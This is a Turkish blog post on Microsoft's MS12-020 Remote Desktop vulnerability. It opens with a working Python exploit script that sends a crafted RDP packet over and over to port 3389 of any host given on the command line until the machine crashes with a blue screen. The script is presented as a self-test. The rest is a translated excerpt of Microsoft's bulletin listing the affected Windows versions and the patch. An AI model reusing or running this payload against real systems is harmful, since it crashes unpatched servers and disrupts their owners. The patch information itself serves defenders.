Microsoft Uzak Masaüstü Erişim Açığı MS12-020 ve Güncel Yama
Microsoft Güvenlik Bülteni MS12-020 – Kritik
Uzak Masaüstü’ndeki Güvenlik Açıkları Uzaktan Kod Yürütülmesine İzin Verebilir (2671387)
EK Açıklama : Bu açık sayesinde uzak masaüstü paylaşımı bulunan sisteme yapılan saldırı sonucunda sistem “Death of Bluescreen -“mavi ekran” hatası verip kendisini yeniden başlatacaktır.
Test Kodu :
#!/usr/bin/env python
#Author: MaYaSeVeN
#Thank BlackBap.Org, Joshua J. Drake(jduck), payload form Chinese
import socket,sys
payload="\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00\x03\x00\x01\xd6\x02\xf0\x80\x7f\x65\x82\x01\x94\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x02\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x30\x19\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\x04\x20\x02\x04\x00\x00\x00\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x04\x82\x01\x33\x00\x05\x00\x14\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x1c\x01\xc0\xd8\x00\x04\x00\x08\x00\x80\x02\xe0\x01\x01\xca\x03\xaa\x09\x04\x00\x00\xce\x0e\x00\x00\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x10\x00\x07\x00\x01\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x2c\x00\x03\x00\x00\x00\x72\x64\x70\x64\x72\x00\x00\x00\x00\x00\x80\x80\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x72\x64\x70\x73\x6e\x64\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00\x03\x00\x00\x08\x02\xf0\x80\x28\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xef\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xeb\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xec\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xed\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xee\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"
i = 1
while(1):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((sys.argv[1],3389))
print "Sending: %d packets" % i
s.send(payload)
rec = s.recv(50)
s.close()
i += 1
except:
print "The Server is down"
exit()
Yukarıdaki kodu çalıştırdığınızda sisteminiz mavi arkan hatası veriyor ise açık sisteminizde mevcut demektir. ( Bir kaç defa yeniden kodu çalıştırmanız gerekebilir)
Yayım Tarihi: 13 Mart 2012 Salı
Sürüm: 1.0
Genel Bilgiler
Yürütmeyle İlgili Özet
Bu güvenlik güncelleştirmesi Uzak Masaüstü Protokolü’ndeki özel olarak bildirilen iki güvenlik açığını giderir. Bu güvenlik açıklarından daha önemli olanı, bir saldırgan etkilenen bir sisteme bir dizi özel hazırlanmış RDP paketi gönderirse uzaktan kod yürütülmesine izin verebilir. Varsayılan olarak, Uzak Masaüstü Protokolü (RDP) herhangi bir Windows işletim sisteminde etkin değildir. RDP’nin etkinleştirilmemiş olduğu sistemler risk altında değildir.
Bu güvenlik güncelleştirmesi Microsoft Windows’un tüm desteklenen sürümleri için Kritik olarak derecelendirilmiştir. Daha fazla bilgi için, bu bölümdeki Etkilenen ve Etkilenmeyen Yazılımlar alt bölümüne bakın.
Güvenlik güncelleştirmesi, Uzak Masaüstü Protokolü’nün bellekteki paketleri işleme ve RDP hizmetinin paketleri işleme biçimini düzelterek bu güvenlik açıklarını giderir. Bu güvenlik açıkları hakkında daha fazla bilgi için, bir sonraki bölüm olan Güvenlik Açığı Bilgileri altında, ilgili güvenlik açığı girdisinin Sık Sorulan Sorular (SSS) alt bölümüne bakın.
Öneri. Müşterilerin büyük bir bölümü otomatik güncelleştirmeleri etkinleştirmiş durumdadır ve bu güvenlik güncelleştirmesi otomatik olarak karşıdan yüklenip kurulacağı için herhangi bir işlem yapmaları gerekmemektedir. Otomatik güncelleştirmeleri etkinleştirmemiş olan müşterilerin güncelleştirmeleri el ile denetlemeleri ve bu güncelleştirmeyi yüklemeleri gerekir. Otomatik güncelleştirmelerin özel yapılandırma seçenekleri hakkında bilgi için, bkz. Microsoft Bilgi Bankası makalesi 294871.
Yöneticiler ve kurumsal yüklemeler ya da bu güvenlik güncelleştirmesini el ile yüklemek isteyen son kullanıcılar için, Microsoft, müşterilerinin güncelleştirme yönetim yazılımlarını kullanarak veya Microsoft Update hizmeti aracılığıyla güncelleştirmeleri denetleyerek güncelleştirmeyi hemen uygulamalarını önerir.
Bu bültenin sonrasında yer alan Algılama ve Dağıtım Araçları ve Kılavuzu bölümüne de bakın.
Bilinen Sorunlar. Microsoft Bilgi Bankası makalesi 2671387, bu güvenlik güncelleştirmesini yükleyen müşterilerin karşılaşabileceği bilinen sorunları belgelemektedir. Bu makale ayrıca, bu sorunlar için önerilen çözümleri de içermektedir.
Etkilenen ve Etkilenmeyen Yazılımlar
Aşağıdaki yazılımlar, hangi sürümlerinin etkilendiğini belirlemek amacıyla sınanmıştır. Diğer sürümler destek ömrünü tamamlamıştır veya bu açıktan etkilenmemektedir. Yazılımınızın sürümünün destek ömrünü belirlemek için Microsoft Destek Ömrü Web sitesini ziyaret edin.
Etkilenen Yazılımlar
İşletim Sistemi | En Yüksek Güvenlik Etkisi | Toplam Önem Derecesi | Bu Güncelleştirmeyle Değiştirilen Bültenler |
---|---|---|---|
Windows XP Service Pack 3 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır |
Windows XP Professional x64 Edition Service Pack 2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır |
Windows Server 2003 Service Pack 2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır |
Windows Server 2003 x64 Edition Service Pack 2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır |
Itanium Tabanlı Sistemler için Windows Server 2003 SP2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır |
Windows Vista Service Pack 2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | KB2621440 yerine hiçbir bülten sunulmamaktadır |
Windows Vista x64 Edition Service Pack 2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | KB2621440 yerine hiçbir bülten sunulmamaktadır |
32-bit sistemler için Windows Server 2008 Service Pack 2* (KB2621440) |
Uzaktan Kod Yürütme | Kritik | KB2621440 yerine hiçbir bülten sunulmamaktadır |
x64 tabanlı sistemler için Windows Server 2008 Service Pack 2* (KB2621440) |
Uzaktan Kod Yürütme | Kritik | KB2621440 yerine hiçbir bülten sunulmamaktadır |
Itanium tabanlı sistemler için Windows Server 2008 Service Pack 2 (KB2621440) |
Uzaktan Kod Yürütme | Kritik | KB2621440 yerine hiçbir bülten sunulmamaktadır |
32-bit sistemler için Windows 7 ve 32-bit sistemler için Windows 7 Service Pack 1 (KB2621440) 32-bit sistemler için Windows 7 ve 32-bit sistemler için Windows 7 Service Pack 1 |
Uzaktan Kod Yürütme | Kritik[1] | KB2621440 yerine hiçbir bülten sunulmamaktadır
KB2667402 yerine hiçbir bülten sunulmamaktadır |
x64 tabanlı sistemler için Windows 7 ve x64 tabanlı sistemler için Windows 7 Service Pack 1 (KB2621440) x64 tabanlı sistemler için Windows 7 ve x64 tabanlı sistemler için Windows 7 Service Pack 1 |
Uzaktan Kod Yürütme | Kritik[1] | KB2621440 yerine hiçbir bülten sunulmamaktadır
KB2667402 yerine hiçbir bülten sunulmamaktadır |
x64 tabanlı sistemler için Windows Server 2008 R2 ve x64 tabanlı sistemler için Windows Server 2008 R2 Service Pack 1* (KB2621440) x64 tabanlı sistemler için Windows Server 2008 R2 ve x64 tabanlı sistemler için Windows Server 2008 R2 Service Pack 1* |
Uzaktan Kod Yürütme | Kritik[1] | KB2621440 yerine hiçbir bülten sunulmamaktadır
KB2667402 yerine hiçbir bülten sunulmamaktadır |
Itanium tabanlı sistemler için Windows Server 2008 R2 ve Itanium tabanlı sistemler için Windows Server 2008 R2 Service Pack 1 (KB2621440) |
Uzaktan Kod Yürütme | Kritik[1] | KB2621440 yerine hiçbir bülten sunulmamaktadır
KB2667402 yerine hiçbir bülten sunulmamaktadır |
*Sunucu Çekirdeği yüklemesi etkilenir. Bu güncelleştirme, Sunucu Çekirdeği yükleme seçeneğinin kullanılmış olup olmadığına bakılmaksızın, Windows Server 2008 veya Windows Server 2008 R2’nin desteklenen sürümlerine aynı önem derecesiyle uygulanır. Bu yükleme seçeneği hakkında daha fazla bilgi için, Sunucu Çekirdeği Yüklemesini Yönetme ve Sunucu Çekirdeği Yüklemesine Hizmet Verme adlı TechNet makalelerine bakın. Sunucu Çekirdeği yükleme seçeneği Windows Server 2008’in ve Windows Server 2008 R2’nin belirli sürümlerinde kullanılamaz; bkz. Sunucu Çekirdeği Yükleme Seçeneklerini Karşılaştırma.
[1]Güncelleştirme paketi KB2621440 ile CVE-2012-0002 ve güncelleştirme paketi KB2667402 ile CVE-2012-0152 giderilir. Microsoft Windows’un etkilenen sürümleri üzerinde CVE-2012-0152’nin önem derecesi KB2621440’tan daha düşük olmakla birlikte, CVE-2012-0002’ye dayalı olarak toplam önem derecesi Kritik olarak belirlenmiştir. Müşteriler sistemlerinde yüklü olan Microsoft Windows sürümü için sunulan tüm güncelleştirmeleri uygulamalıdır.
POST YOUR COMMENTS
You must be logged in to post a comment.